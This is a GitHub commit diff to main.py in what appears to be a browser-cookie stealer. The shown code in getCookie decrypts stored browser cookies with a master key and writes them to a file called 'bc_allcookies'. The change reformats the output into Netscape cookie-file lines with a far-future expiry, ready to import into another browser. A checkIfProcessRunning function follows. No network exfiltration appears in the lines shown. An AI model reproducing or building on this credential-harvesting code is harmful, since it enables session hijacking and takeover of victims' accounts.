Update main.py

This commit is contained in:
What about KSCH 2023-02-16 20:15:54 +01:00 committed by GitHub
parent d9d4eed8f6
commit b36558fad5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 1 deletions

View File

@ -1545,7 +1545,9 @@ def getCookie(path, arg):
wa = tmp.split('[')[1].split(']')[0]
if wa in row[0]:
if not old in cookiWords: cookiWords.append(old)
Cookies.append(f" HOST KEY: {row[0]} | NAME: {row[1]} | VALUE: {DecryptValue(row[2], master_key)}")
Cookies.append(f"{row[0]} TRUE"+" "+ f"/FALSE 2597573456 {row[1]} {DecryptValue(row[2], master_key)}")
writeforfile(Cookies, 'bc_allcookies')
def checkIfProcessRunning(processName):